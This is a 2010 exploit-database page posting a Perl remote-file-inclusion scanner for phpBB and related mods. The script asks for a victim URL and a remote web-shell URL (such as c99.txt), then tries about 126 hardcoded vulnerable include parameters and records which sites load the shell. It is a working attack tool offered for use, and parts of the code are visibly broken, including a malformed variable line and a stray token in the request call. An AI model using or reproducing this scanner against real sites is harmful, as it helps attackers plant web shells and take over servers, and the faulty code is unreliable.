Home / os / win7

[webapps / 0day] - PHPbb v27.9 Inj3ct0r RFI Scanner

Posted on 27 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PHPbb v27.9 Inj3ct0r RFI Scanner | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='PHPbb v27.9 Inj3ct0r RFI Scanner by jos_ali_joe in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================== PHPbb - v27.9 Inj3ct0r RFI Scanner ================================== #!/usr/bin/perl 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&#039; __ /&#039;__` / \__ /&#039;__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /&#039; _ ` / /_/_\_&lt;_ /&#039;___ / /`&#039;__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit Database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I&#039;m jos_ali_joe member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ############################################################ #RFI Scanner Perl PHPbb - v27.9 Inj3ct0r # #Coded by jos_ali_joe RFI Scanner Perl # #Indonesian Docer Team &amp; member from Inj3ct0r Team # #Contact: josalijoe@yahoo.com # #Home : josalijoe.wordpress.com/ $ http://inj3ct0r.com # #ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael # ############################################################ use HTTP::Request; use LWP::UserAgent; sub lw { my $SO = $^O; my $linux = &quot;&quot;; if (index(lc($SO),&quot;win&quot;)!=-1){ $linux=&quot;0&quot;; }else{ $linux=&quot;1&quot;; } if($linux){ system(&quot;clear&quot;); } else{ system(&quot;cls&quot;); system (&quot;title RFI Scanner Perl PHPbb - v27.9 &quot;); system (&quot;color 02&quot;); } } &amp;lw; print &quot; ######################################################## &quot;; print &quot; ## RFI Scanner PHPbb v27.9 Inj3ct0r ## &quot;; print &quot; ## by jos_ali_joe ## &quot;; print &quot; ## special thanks : gunslinger_ &amp; r0073r ## &quot;; print &quot; ######################################################## &quot;; print &quot;Insert host:(ex: http://www.maho.com/) &quot;; $host=&lt;STDIN&gt;; chomp $host; print &quot; &quot;; # If the url doesn&#039;t have http: at the beginning if ( $host !~ /^http:/ ) { # we add it $host = &#039;http://&#039; . $host; } # If the url doesn&#039;t have / at the end if ( $host !~ //$/ ) { # we add it $host = $host . &#039;/&#039;; } print &quot;Insert shell:(ex: http://www.maho.com/c99.txt) &quot;; $shell=&lt;STDIN&gt;; chomp $shell; print &quot; &quot;; # If the url doesn&#039;t have http: at the beginning if ( $shell !~ /^http:/ ) { # we add it $shell = &#039;http://&#039; . $shell; } print &quot;Insert string search:(ex: c99shell) &quot;; $string=&lt;STDIN&gt;; chomp $string; print &quot; &quot;; print &quot;Your config: &quot;; print &quot; Victim: $host &quot;; print &quot; Url Shell: $shell &quot;; print &quot; Search String: $string &quot;; print &quot;Scan... &quot;; $vuln1=&quot;/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=&quot;; $vuln2=&quot;/includes/functions_portal.php?phpbb_root_path=&quot;; $vuln3=&quot;/includes/functions_mod_user.php?phpbb_root_path=&quot;; $vuln4=&quot;/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=&quot;; $vuln5=&quot;administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=&quot;; $vuln6=&quot;/language/lang_german/lang_main_album.php?phpbb_root_path=&quot;; $vuln7=&quot;/link_main.php?phpbb_root_path=&quot;; $vuln8=&quot;/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&amp;newsSync_NUKE_PATH=&quot;; $vuln9=&quot;MOD_forum_fields_parse.php?phpbb_root_path=&quot;; $vuln10=&quot;/codebb/pass_code.php?phpbb_root_path=&quot;; $vuln11=&quot;/codebb/lang_select?phpbb_root_path=&quot;; $vuln12=&quot;/includes/functions_nomoketos_rules.php?phpbb_root_path=&quot;; $vuln13=&quot;/includes/functions.php?phpbb_root_path=&quot;; $vuln14=&quot;/admin/admin_forum_prune.php?phpbb_root_path=&quot;; $vuln15=&quot;/ezconvert/config.php?ezconvert_dir=&quot;; $vuln16=&quot;/includes/class_template.php?phpbb_root_path=&quot;; $vuln17=&quot;/includes/usercp_viewprofile.php?phpbb_root_path=&quot;; $vuln18=&quot;/includes/functions.php?phpbb_root_path=&quot;; $vuln19=&quot;/menu.php?sesion_idioma=&quot;; $vuln20=&quot;/includes/functions.php?phpbb_root_path=&quot;; $vuln21=&quot;/admin/admin_linkdb.php?phpbb_root_path=&quot;; $vuln22=&quot;/admin/admin_extensions.php?phpbb_root_path=&quot;; $vuln23=&quot;/admin/admin_board.php?phpbb_root_path=&quot;; $vuln24=&quot;/admin/admin_attachments.php?phpbb_root_path=&quot;; $vuln25=&quot;/admin/admin_users.php?phpbb_root_path=&quot;; $vuln26=&quot;/includes/archive/archive_topic.php?phpbb_root_path=&quot;; $vuln28=&quot;/admin/modules_data.php?phpbb_root_path=&quot;; $vuln29=&quot;/faq.php?foing_root_path=&quot;; $vuln30=&quot;/index.php?foing_root_path=&quot;; $vuln31=&quot;/list.php?foing_root_path=&quot;; $vuln32=&quot;/login.php?foing_root_path=&quot;; $vuln33=&quot;/playlist.php?foing_root_path=&quot;; $vuln34=&quot;/song.php?foing_root_path=&quot;; $vuln35=&quot;/gen_m3u.php?foing_root_path=&quot;; $vuln36=&quot;/view_artist.php?foing_root_path=&quot;; $vuln37=&quot;/view_song.php?foing_root_path=&quot;; $vuln38=&quot;/login.php?foing_root_path=&quot;; $vuln39=&quot;/flash/set_na.php?foing_root_path=&quot;; $vuln40=&quot;/flash/initialise.php?foing_root_path=&quot;; $vuln41=&quot;/flash/get_song.php?foing_root_path=&quot;; $vuln42=&quot;/includes/common.php?foing_root_path=&quot;; $vuln43=&quot;/admin/nav.php?foing_root_path=&quot;; $vuln44=&quot;/admin/main.php?foing_root_path=&quot;; $vuln45=&quot;/admin/list_artists.php?foing_root_path=&quot;; $vuln46=&quot;/admin/index.php?foing_root_path=&quot;; $vuln47=&quot;/admin/genres.php?foing_root_path=&quot;; $vuln48=&quot;/admin/edit_artist.php?foing_root_path=&quot;; $vuln49=&quot;/admin/edit_album.php?foing_root_path=&quot;; $vuln50=&quot;/admin/config.php?foing_root_path=&quot;; $vuln51=&quot;/admin/admin_status.php?foing_root_path=&quot;; $vuln52=&quot;language/lang_english/lang_prillian_faq.php?phpbb_root_path=&quot;; $vuln53=&quot;/includes/functions_mod_user.php?phpbb_root_path=&quot;; $vuln54=&quot;/language/lang_french/lang_prillian_faq.php?phpbb_root_path=&quot;; $vuln55=&quot;/includes/archive/archive_topic.php?phpbb_root_path=&quot;; $vuln56=&quot;/functions_rpg_events.php?phpbb_root_path=&quot;; $vuln57=&quot;/admin/admin_spam.php?phpbb_root_path=&quot;; $vuln58=&quot;/includes/functions_newshr.php?phpbb_root_path=&quot;; $vuln59=&quot;/zufallscodepart.php?phpbb_root_path=&quot;; $vuln60=&quot;/mods/iai/includes/constants.php?phpbb_root_path=&quot;; $vuln61=&quot;/root/includes/antispam.php?phpbb_root_path=&quot;; $vuln62=&quot;/phpBB2/shoutbox.php?phpbb_root_path=&quot;; $vuln63=&quot;/includes/functions_mod_user.php?phpbb_root_path=&quot;; $vuln64=&quot;/includes/functions_mod_user.php?phpbb_root_path=&quot;; $vuln65=&quot;/includes/journals_delete.php?phpbb_root_path=&quot;; $vuln66=&quot;/includes/journals_post.php?phpbb_root_path=&quot;; $vuln67=&quot;/includes/journals_edit.php?phpbb_root_path=&quot;; $vuln68=&quot;/includes/functions_num_image.php?phpbb_root_path=&quot;; $vuln69=&quot;/includes/functions_user_viewed_posts.php?phpbb_root_path=&quot;; $vuln70=&quot;/includes/themen_portal_mitte.php?phpbb_root_path=&quot;; $vuln71=&quot;/includes/logger_engine.php?phpbb_root_path=&quot;; $vuln72=&quot;/includes/logger_engine.php?phpbb_root_path=&quot;; $vuln73=&quot;/includes/functions_static_topics.php?phpbb_root_path=&quot;; $vuln74=&quot;/admin/admin_topic_action_logging.php?setmodules=pagestart&amp;phpbb_root_path=&quot;; $vuln75=&quot;/includes/functions_kb.php?phpbb_root_path=&quot;; $vuln76=&quot;/includes/bbcb_mg.php?phpbb_root_path=&quot;; $vuln77=&quot;/admin/admin_topic_action_logging.php?setmodules=attach&amp;phpbb_root_path=&quot;; $vuln78=&quot;/includes/pafiledb_constants.php?module_root_path=&quot;; $vuln79=&quot;/index.php?phpbb_root_path=&quot;; $vuln80=&quot;/song.php?phpbb_root_path=&quot;; $vuln81=&quot;/faq.php?phpbb_root_path=&quot;; $vuln82=&quot;/list.php?phpbb_root_path=&quot;; $vuln83=&quot;/gen_m3u.php?phpbb_root_path=&quot;; $vuln84=&quot;/playlist.php?phpbb_root_path=&quot;; $vuln85=&quot;/language/lang_english/lang_activity.php?phpbb_root_path=&quot;; $vuln86=&quot;/language/lang_english/lang_activity.php?phpbb_root_path=&quot;; $vuln87=&quot;/blend_data/blend_common.php?phpbb_root_path=&quot;; $vuln88=&quot;/blend_data/blend_common.php?phpbb_root_path=&quot;; $vuln89=&quot;/modules/Forums/admin/index.php?phpbb_root_path=&quot;; $vuln90=&quot;/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=&quot;; $vuln91=&quot;/modules/Forums/admin/admin_board.php?phpbb_root_path=&quot;; $vuln92=&quot;/modules/Forums/admin/admin_disallow.php?phpbb_root_path=&quot;; $vuln93=&quot;/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=&quot;; $vuln94=&quot;/modules/Forums/admin/admin_groups.php?phpbb_root_path=&quot;; $vuln95=&quot;/modules/Forums/admin/admin_ranks.php?phpbb_root_path=&quot;; $vuln96=&quot;/modules/Forums/admin/admin_styles.php?phpbb_root_path=&quot;; $vuln97=&quot;/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=&quot;; $vuln98=&quot;/modules/Forums/admin/admin_words.php?phpbb_root_path=&quot;; $vuln99=&quot;/modules/Forums/admin/admin_avatar.php?phpbb_root_path=&quot;; $vuln100=&quot;/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=&quot;; $vuln101=&quot;/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=&quot;; $vuln102=&quot;/modules/Forums/admin/admin_forums.php?phpbb_root_path=&quot;; $vuln103=&quot;/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=&quot;; $vuln104=&quot;/modules/Forums/admin/admin_smilies.php?phpbb_root_path=&quot;; $vuln105=&quot;$vuln58=&quot;/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=&quot;; $vuln106=&quot;/modules/Forums/admin/admin_users.php?phpbb_root_path=&quot;; $vuln107=&quot;/stat_modules/users_age/module.php?phpbb_root_path=&quot;; $vuln108=&quot;/includes/functions_cms.php?phpbb_root_path=&quot;; $vuln109=&quot;/m2f/m2f_phpbb204.php?m2f_root_path=&quot;; $vuln110=&quot;/m2f/m2f_forum.php?m2f_root_path=&quot;; $vuln111=&quot;/m2f/m2f_mailinglist.php?m2f_root_path=&quot;; $vuln112=&quot;/m2f/m2f_cron.php?m2f_root_path=&quot;; $vuln113=&quot;/lib/phpbb.php?subdir=&quot;; $vuln114=&quot;/includes/functions_mod_user.php?phpbb_root_path=&quot;; $vuln115=&quot;/includes/functions.php?phpbb_root_path=&quot;; $vuln116=&quot;/includes/functions_portal.php?phpbb_root_path=&quot;; $vuln117=&quot;/includes/functions.php?phpbb_root_path=&quot;; $vuln118=&quot;/includes/functions_admin.php?phpbb_root_path=&quot;; $vuln119=&quot;/toplist.php?f=toplist_top10&amp;phpbb_root_path=&quot;; $vuln120=&quot;/admin/addentry.php?phpbb_root_path=&quot;; $vuln121=&quot;/includes/kb_constants.php?module_root_path=&quot;; $vuln122=&quot;/auth/auth.php?phpbb_root_path=&quot;; $vuln123=&quot;/auth/auth_phpbb/phpbb_root_path=&quot;; $vuln124=&quot;/auction/auction_common.php?phpbb_root_path=&quot;; $vuln125=&quot;/auth/auth_SMF/smf_root_path=&quot;; $vuln126=&quot;/auth/auth.php?smf_root_path=&quot;; for ($i=1;$i&lt;59;$i++) { $cont=vuln.$i; chomp $cont; print &quot;$cont &quot;; $final=$host.$$cont.&quot;$shell?&quot;; my $req=HTTP::Request-&gt;new(GET=&gt;$final alias selesai); my $ua=LWP::UserAgent-&gt;new(); $ua-&gt;timeout(30); my $response=$ua-&gt;request($req); if ($response-&gt;is_success) { if( $response-&gt;content =~ /$string/){ open(FILE,&quot;&gt;&gt;results.txt&quot;); print FILE &quot;$final &quot;; close(FILE); print &quot;------------------------------------------------- &quot;; print &quot;$final &quot;; print &quot;IS VULNZ.. &quot;; print &quot;------------------------------------------------- &quot;; }} } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-27]</pre></body></html>

 

TOP